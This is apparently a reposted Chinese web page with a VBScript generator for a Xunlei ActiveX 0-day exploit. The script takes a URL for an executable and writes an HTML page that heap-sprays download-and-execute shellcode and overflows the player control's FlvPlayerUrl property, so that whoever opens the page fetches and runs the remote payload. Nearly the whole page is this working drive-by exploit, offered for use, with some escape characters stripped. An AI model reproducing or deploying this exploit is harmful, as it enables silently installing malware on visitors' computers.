[vbs也写EXP]xunlei_0day_exp

		
来源：vbs空间
exeurl = InputBox( "请输入下载执行exe的地址：", "输入","http//np.icehack.com/np.exe" )
code by NetPatch
if exeurl <> "" then
code="x43x43x43x43x43x43xe9xa3x00x00x00x5fx64xa1x30x00x00x00x8bx40x0cx8bx70x1cxadx8bx68x08x8bxf7x6ax04x59xe8x43x00x00x00xe2xf9x68x6fx6ex00x00x68x75x72x6cx6dx54xffx16x95xe8x2ex00x00x00x83xecx20x8bxdcx6ax20x53xffx56x04xc7x04x03x5cx61x2ex65xc7x44x03x04x78x65x00x00x33xc0x50x50x53x57x50xffx56x10x8bxdcx50x53xffx56x08xffx56x0cx51x56x8bx75x3cx8bx74x2ex78x03xf5x56x8bx76x20x03xf5x33xc9x49x41xadx03xc5x33xdbx0fxbex10x3axd6x74x08xc1xcbx0dx03xdax40xebxf1x3bx1fx75xe7x5ex8bx5ex24x03xddx66x8bx0cx4bx8bx5ex1cx03xddx8bx04x8bx03xc5xabx5ex59xc3xe8x58xffxffxffx8ex4ex0execxc1x79xe5xb8x98xfex8ax0exefxcexe0x60x36x1ax2fx70"
down=exeurl&Chr(00)
Function Unicode(str1)
Dim str,temp
str = ""
For i=1 to len(str1)
temp = Hex(AscW(Mid(str1,i,1)))
If len(temp) < 5 Then temp = right("0000"&temp, 2)
str = str & "x" & temp
Next
Unicode = str
End Function
function replaceregex(str)
set regex=new regExp
regex.pattern="\x(..)\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("netpatch.htm",8,true)
fileS.writeline "<SCRIPT language=""JavaScript"">"
fileS.writeline "var expires = new Date();"
fileS.writeline "expires.setTime(expires.getTime() + 0 * 0 * 1 * 1000);"
fileS.writeline "var set_cookie = document.cookie.indexOf(""say_hello=""); "
fileS.writeline "if (set_cookie == -1){document.cookie = ""say_hello=1;expires="" + expires.toGMTString();"
fileS.writeline "document.write(<object id=""gl"" classid=""clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F""></object>);"
fileS.writeline "var helloworld2Address = 0x0c0c0c0c;"
fileS.writeline "var shellcode = unescape("""&replaceregex(code&Unicode(down))&""");"
fileS.writeline "var hbshelloworld = 0x100000;"
fileS.writeline "var payLoadSize = shellcode.length * 2;"
fileS.writeline "var spraySlideSize = hbshelloworld - (payLoadSize+0x38);"
fileS.writeline "var spraySlide = unescape(""%u0c0c%u0c0c"");"
fileS.writeline "spraySlide = getSpraySlide(spraySlide,spraySlideSize);"
fileS.writeline "heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;"
fileS.writeline "memory = new Array();"
fileS.writeline "for (i=0;i<heapBlocks;i++)"
fileS.writeline "{"
fileS.writeline " memory[i] = spraySlide + shellcode;"
fileS.writeline "}"
fileS.writeline "function getSpraySlide(spraySlide, spraySlideSize)"
fileS.writeline "{"
fileS.writeline "while (spraySlide.length*2<spraySlideSize)"
fileS.writeline "{"
fileS.writeline " spraySlide += spraySlide;"
fileS.writeline "}"
fileS.writeline "spraySlide = spraySlide.substring(0,spraySlideSize/2);"
fileS.writeline "return spraySlide;"
fileS.writeline "}"
fileS.writeline "var size_buff = 1070;"
fileS.writeline "var x = unescape(""%0c%0c%0c%0c"");"
fileS.writeline "while (x.length<size_buff) x += x;"
fileS.writeline "gl.FlvPlayerUrl = x;"
fileS.writeline "}"
fileS.writeline "</SCRIPT>"
fileS.writeline "<script>"
fileS.writeline "if (set_cookie == -1){"
fileS.writeline "location.reload();"
fileS.writeline "}"
fileS.writeline "</script>"files.Close
Set fso=nothing
msgbox "生成完毕!"
end if
						
		
	

补充：软件开发 , Vb ,

上一个：非常规运行vbs
下一个：用VB编写最简单远控程序